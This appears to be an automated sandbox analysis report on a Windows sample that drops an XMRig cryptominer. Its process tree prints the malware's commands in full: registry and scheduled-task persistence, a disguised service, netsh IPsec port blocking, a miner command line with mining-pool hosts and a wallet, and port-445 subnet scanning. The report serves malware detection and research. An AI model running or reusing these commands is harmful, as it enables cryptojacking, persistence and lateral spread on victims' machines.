Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
07-05-2021 12:57
Behavioral task
behavioral1
Sample
aa.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
aa.exe
Resource
win10v20210408
General
-
Target
aa.exe
-
Size
28.1MB
-
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf
-
SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790
-
SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
-
SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
spmjgd.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\JEkAx\\spmjgd.exe" spmjgd.exe -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload 4 IoCs
Processes:
resource yara_rule C:\Windows\JEkAx\spmjgd.exe xmrig C:\Windows\JEkAx\spmjgd.exe xmrig C:\Windows\JEkAx\HW.exe xmrig behavioral2/memory/3052-161-0x0000000000400000-0x0000000000B4B000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 4 IoCs
Processes:
spmjgd.exeHW.exesvchost.exesvchost.exepid process 348 spmjgd.exe 3052 HW.exe 3588 svchost.exe 184 svchost.exe -
Drops file in Windows directory 64 IoCs
Processes:
spmjgd.exesvchost.exeaa.exedescription ioc process File created C:\Windows\JEkAx\pcla-0.dll spmjgd.exe File created C:\Windows\JEkAx\pcre-0.dll spmjgd.exe File created C:\Windows\JEkAx\riar-2.dll spmjgd.exe File created C:\Windows\JEkAx\tucl-1.dll spmjgd.exe File created C:\Windows\JEkAx\svchost.exe spmjgd.exe File created C:\Windows\JEkAx\chrome..exe spmjgd.exe File created C:\Windows\JEkAx\exma.dll spmjgd.exe File created C:\Windows\JEkAx\pcreposix-0.dll spmjgd.exe File created C:\Windows\JEkAx\tibe.dll spmjgd.exe File created C:\Windows\JEkAx\coli-0.dll spmjgd.exe File created C:\Windows\JEkAx\etchCore-0.x64.dll spmjgd.exe File created C:\Windows\JEkAx\eteb-2.dll spmjgd.exe File created C:\Windows\JEkAx\exma-1.dll spmjgd.exe File created C:\Windows\JEkAx\tibe-1.dll spmjgd.exe File created C:\Windows\JEkAx\ip.dll spmjgd.exe File created C:\Windows\JEkAx\Cstr.fb spmjgd.exe File created C:\Windows\JEkAx\Cstr.xml spmjgd.exe File created C:\Windows\JEkAx\cnli-0.dll spmjgd.exe File created C:\Windows\JEkAx\tibe-2.dll spmjgd.exe File created C:\Windows\JEkAx\chrome..xml spmjgd.exe File created C:\Windows\JEkAx\posh-0.dll spmjgd.exe File created C:\Windows\JEkAx\TFf spmjgd.exe File created C:\Windows\JEkAx\adfw-2.dll spmjgd.exe File created C:\Windows\JEkAx\etch-0.dll spmjgd.exe File created C:\Windows\JEkAx\libxml2.dll spmjgd.exe File created C:\Windows\JEkAx\trfo-2.dll spmjgd.exe File created C:\Windows\JEkAx\tucl.dll spmjgd.exe File created C:\Windows\JEkAx\xdvl-0.dll spmjgd.exe File opened for modification C:\Windows\JEkAx\Result.txt svchost.exe File created C:\Windows\JEkAx\dmgd-1.dll spmjgd.exe File created C:\Windows\JEkAx\libeay32.dll spmjgd.exe File created C:\Windows\JEkAx\riar.dll spmjgd.exe File created C:\Windows\JEkAx\zlib1.dll spmjgd.exe File opened for modification C:\Windows\JEkAx\s.bat spmjgd.exe File created C:\Windows\JEkAx\tscl.html aa.exe File created C:\Windows\JEkAx\spmjgd.exe aa.exe File created C:\Windows\JEkAx\etchCore-0.x86.dll spmjgd.exe File created C:\Windows\JEkAx\HW.exe spmjgd.exe File created C:\Windows\IME\tps.exe aa.exe File created C:\Windows\boy.exe aa.exe File created C:\Windows\JEkAx\chrome..fb spmjgd.exe File created C:\Windows\JEkAx\adfw.dll spmjgd.exe File created C:\Windows\JEkAx\trch.dll spmjgd.exe File created C:\Windows\JEkAx\trch-1.dll spmjgd.exe File created C:\Windows\JEkAx\trfo.dll spmjgd.exe File created C:\Windows\JEkAx\ssleay32.dll spmjgd.exe File created C:\Windows\JEkAx\zibe.dll spmjgd.exe File created C:\Windows\JEkAx\s.bat spmjgd.exe File created C:\Windows\end.bat spmjgd.exe File created C:\Windows\JEkAx\dmgd-4.dll spmjgd.exe File opened for modification C:\Windows\JEkAx\tscl.html spmjgd.exe File created C:\Windows\JEkAx\etebCore-2.x64.dll spmjgd.exe File created C:\Windows\JEkAx\etebCore-2.x86.dll spmjgd.exe File created C:\Windows\JEkAx\libiconv-2.dll spmjgd.exe File created C:\Windows\JEkAx\posh.dll spmjgd.exe File created C:\Windows\JEkAx\ucl.dll spmjgd.exe File created C:\Windows\JEkAx\libcurl.dll spmjgd.exe File created C:\Windows\JEkAx\trch-0.dll spmjgd.exe File created C:\Windows\JEkAx\trfo-0.dll spmjgd.exe File created C:\Windows\JEkAx\WinRing0x64.sys spmjgd.exe File opened for modification C:\Windows\end.bat spmjgd.exe File created C:\Windows\JEkAx\qdx.bat spmjgd.exe File created C:\Windows\JEkAx\cnli-1.dll spmjgd.exe File created C:\Windows\JEkAx\Cstr.exe spmjgd.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
spmjgd.exepid process 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe 348 spmjgd.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
HW.exedescription pid process Token: SeLockMemoryPrivilege 3052 HW.exe Token: SeLockMemoryPrivilege 3052 HW.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
aa.exespmjgd.exepid process 624 aa.exe 624 aa.exe 348 spmjgd.exe 348 spmjgd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
aa.exespmjgd.execmd.execmd.execmd.exedescription pid process target process PID 624 wrote to memory of 348 624 aa.exe spmjgd.exe PID 624 wrote to memory of 348 624 aa.exe spmjgd.exe PID 624 wrote to memory of 348 624 aa.exe spmjgd.exe PID 624 wrote to memory of 3708 624 aa.exe cmd.exe PID 624 wrote to memory of 3708 624 aa.exe cmd.exe PID 624 wrote to memory of 3708 624 aa.exe cmd.exe PID 348 wrote to memory of 2964 348 spmjgd.exe cmd.exe PID 348 wrote to memory of 2964 348 spmjgd.exe cmd.exe PID 348 wrote to memory of 2964 348 spmjgd.exe cmd.exe PID 2964 wrote to memory of 2292 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 2292 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 2292 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 2800 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 2800 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 2800 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3600 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3600 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3600 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3732 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3732 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3732 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 840 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 840 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 840 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 844 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 844 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 844 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3984 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3984 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3984 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 620 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 620 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 620 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 2304 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 2304 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 2304 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3580 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3580 2964 cmd.exe netsh.exe PID 2964 wrote to memory of 3580 2964 cmd.exe netsh.exe PID 348 wrote to memory of 2172 348 spmjgd.exe cmd.exe PID 348 wrote to memory of 2172 348 spmjgd.exe cmd.exe PID 348 wrote to memory of 2172 348 spmjgd.exe cmd.exe PID 348 wrote to memory of 2300 348 spmjgd.exe cmd.exe PID 348 wrote to memory of 2300 348 spmjgd.exe cmd.exe PID 348 wrote to memory of 2300 348 spmjgd.exe cmd.exe PID 2172 wrote to memory of 3592 2172 cmd.exe netsh.exe PID 2172 wrote to memory of 3592 2172 cmd.exe netsh.exe PID 2172 wrote to memory of 3592 2172 cmd.exe netsh.exe PID 2300 wrote to memory of 3600 2300 cmd.exe netsh.exe PID 2300 wrote to memory of 3600 2300 cmd.exe netsh.exe PID 2300 wrote to memory of 3600 2300 cmd.exe netsh.exe PID 2172 wrote to memory of 3912 2172 cmd.exe netsh.exe PID 2172 wrote to memory of 3912 2172 cmd.exe netsh.exe PID 2172 wrote to memory of 3912 2172 cmd.exe netsh.exe PID 2172 wrote to memory of 3676 2172 cmd.exe netsh.exe PID 2172 wrote to memory of 3676 2172 cmd.exe netsh.exe PID 2172 wrote to memory of 3676 2172 cmd.exe netsh.exe PID 2300 wrote to memory of 3924 2300 cmd.exe netsh.exe PID 2300 wrote to memory of 3924 2300 cmd.exe netsh.exe PID 2300 wrote to memory of 3924 2300 cmd.exe netsh.exe PID 2300 wrote to memory of 2256 2300 cmd.exe netsh.exe PID 2300 wrote to memory of 2256 2300 cmd.exe netsh.exe PID 2300 wrote to memory of 2256 2300 cmd.exe netsh.exe PID 2172 wrote to memory of 408 2172 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\aa.exe"C:\Users\Admin\AppData\Local\Temp\aa.exe"1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\JEkAx\spmjgd.exeC:\Windows\JEkAx\spmjgd.exe2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "3⤵
-
C:\Windows\SysWOW64\sc.exesc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\JEkAx\qdx.bat" "3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\JEkAx\spmjgd.exe" /SC ONSTART4⤵
- Creates scheduled task(s)
-
C:\Windows\JEkAx\HW.exe"C:\Windows\JEkAx\HW.exe" -o stratum+tcp://dns.monerogb.com:6502 -o stratum+tcp://note.monerogb.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\JEkAx\s.bat" "3⤵
-
C:\Windows\JEkAx\svchost.exesvchost.exe syn 10.10.0.0 10.10.255.255 445 /save4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\JEkAx\s.bat" "3⤵
-
C:\Windows\JEkAx\svchost.exesvchost.exe tcp 10.10.0.0 10.10.255.255 445 450 /save4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\JEkAx\HW.exeMD5
8460b86a434521fe122230467dffc2a5
SHA1f7bd0696c9201d5270cb75deb82895a85a5298a2
SHA256812a448e4023b2b7b52dffe30e72b77b96b4f334263e1b0f2daad8e33a68143d
SHA512fb6504aed5c99010faa00332eecdf2916393490b79b8819a1e338238fd0f21e7255550e3155fc0efbe2295858df84ffe1f703eaf9ffdd824406f80d2c7fe58dc
-
C:\Windows\JEkAx\qdx.batMD5
bb65b48991cff890a18183e95985117b
SHA1386f006b1e400bdc3c0993ce988880e2dbf0bc67
SHA25637da421f46c751ad1cd5b95bf9b87a8b45f02c7fe611f30c5042fd279b384bc5
SHA5124c996041f7ba392fea71030096837d1950fbe093e80e531f9bba5a92ad869acec31e81e4532037b843c3ac11da156fb1e7f4ae86278f9397222a7ca3533d5dc1
-
C:\Windows\JEkAx\s.batMD5
6b695370f0a67101c00adc502c38497d
SHA13d0e2001771d6e66ee5babe44851fdd0ae4f9368
SHA2562bcbdea44bc635c11b839ce12091dede30cf7b0f7b747241268dac4d543710c0
SHA51254c17014864eb117292320e59305919356db3e6a0c42bff918a987f70b8a0036530a7e581eff19ed315b9ac95cdd3a439c27e8fc47cc485e5c3ccbb0b1370ada
-
C:\Windows\JEkAx\s.batMD5
7b3117aa38e0070cb934b5494d28bf8f
SHA10f13e6b970b67ccf59715c648b1c511be5b5507a
SHA256a6eb67794241877255de8afaac418794cb3ec37f144f31d0f1a4e4375f4647e7
SHA512e93ab0b124e30c60582c0f373e405d1e18e595b8637cce1313a0ed0791fdbf4b51a93dd2236daca0055034ea2fbc8945d981017e04cf1283b16bb0e368b7221c
-
C:\Windows\JEkAx\spmjgd.exeMD5
8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA51212e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
-
C:\Windows\JEkAx\spmjgd.exeMD5
8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA51212e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
-
C:\Windows\JEkAx\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\JEkAx\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\JEkAx\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\JEkAx\tscl.htmlMD5
41f245fd82ec901eb2eea12ea69f5816
SHA12a9440c8f99f9f614953f0be6e0d28c0e7aa41cb
SHA256e069676c3c9eb15005175e3e9ab758e43b9894b07bb6c16e2e5db80db97dcec8
SHA512809ce123b499d79c89988eda91cbe6f8552b0cc524e61359c6b9f9287a2dcbd4b198653d0bf758e11e86ead671a0225c6369461d8a86a6cb9980da0091c51252
-
C:\Windows\end.batMD5
c017d5f762ae5d67efb7d099b53cca58
SHA1ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
C:\Windows\end.batMD5
c017d5f762ae5d67efb7d099b53cca58
SHA1ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
memory/8-150-0x0000000000000000-mapping.dmp
-
memory/184-151-0x0000000000000000-mapping.dmp
-
memory/184-169-0x0000000000000000-mapping.dmp
-
memory/348-114-0x0000000000000000-mapping.dmp
-
memory/408-139-0x0000000000000000-mapping.dmp
-
memory/620-148-0x0000000000000000-mapping.dmp
-
memory/620-127-0x0000000000000000-mapping.dmp
-
memory/628-162-0x0000000000000000-mapping.dmp
-
memory/840-124-0x0000000000000000-mapping.dmp
-
memory/844-125-0x0000000000000000-mapping.dmp
-
memory/844-147-0x0000000000000000-mapping.dmp
-
memory/1124-167-0x0000000000000000-mapping.dmp
-
memory/1148-155-0x0000000000000000-mapping.dmp
-
memory/1628-143-0x0000000000000000-mapping.dmp
-
memory/1824-141-0x0000000000000000-mapping.dmp
-
memory/1908-152-0x0000000000000000-mapping.dmp
-
memory/2088-153-0x0000000000000000-mapping.dmp
-
memory/2104-145-0x0000000000000000-mapping.dmp
-
memory/2172-130-0x0000000000000000-mapping.dmp
-
memory/2240-149-0x0000000000000000-mapping.dmp
-
memory/2256-157-0x0000000000000000-mapping.dmp
-
memory/2256-138-0x0000000000000000-mapping.dmp
-
memory/2292-120-0x0000000000000000-mapping.dmp
-
memory/2300-131-0x0000000000000000-mapping.dmp
-
memory/2304-128-0x0000000000000000-mapping.dmp
-
memory/2304-140-0x0000000000000000-mapping.dmp
-
memory/2668-142-0x0000000000000000-mapping.dmp
-
memory/2760-146-0x0000000000000000-mapping.dmp
-
memory/2800-121-0x0000000000000000-mapping.dmp
-
memory/2964-118-0x0000000000000000-mapping.dmp
-
memory/3052-161-0x0000000000400000-0x0000000000B4B000-memory.dmpFilesize
7.3MB
-
memory/3052-159-0x0000000000000000-mapping.dmp
-
memory/3580-129-0x0000000000000000-mapping.dmp
-
memory/3588-164-0x0000000000000000-mapping.dmp
-
memory/3592-133-0x0000000000000000-mapping.dmp
-
memory/3600-134-0x0000000000000000-mapping.dmp
-
memory/3600-122-0x0000000000000000-mapping.dmp
-
memory/3676-136-0x0000000000000000-mapping.dmp
-
memory/3708-117-0x0000000000000000-mapping.dmp
-
memory/3732-123-0x0000000000000000-mapping.dmp
-
memory/3912-135-0x0000000000000000-mapping.dmp
-
memory/3924-137-0x0000000000000000-mapping.dmp
-
memory/3984-126-0x0000000000000000-mapping.dmp
-
memory/4000-144-0x0000000000000000-mapping.dmp
-
memory/4052-154-0x0000000000000000-mapping.dmp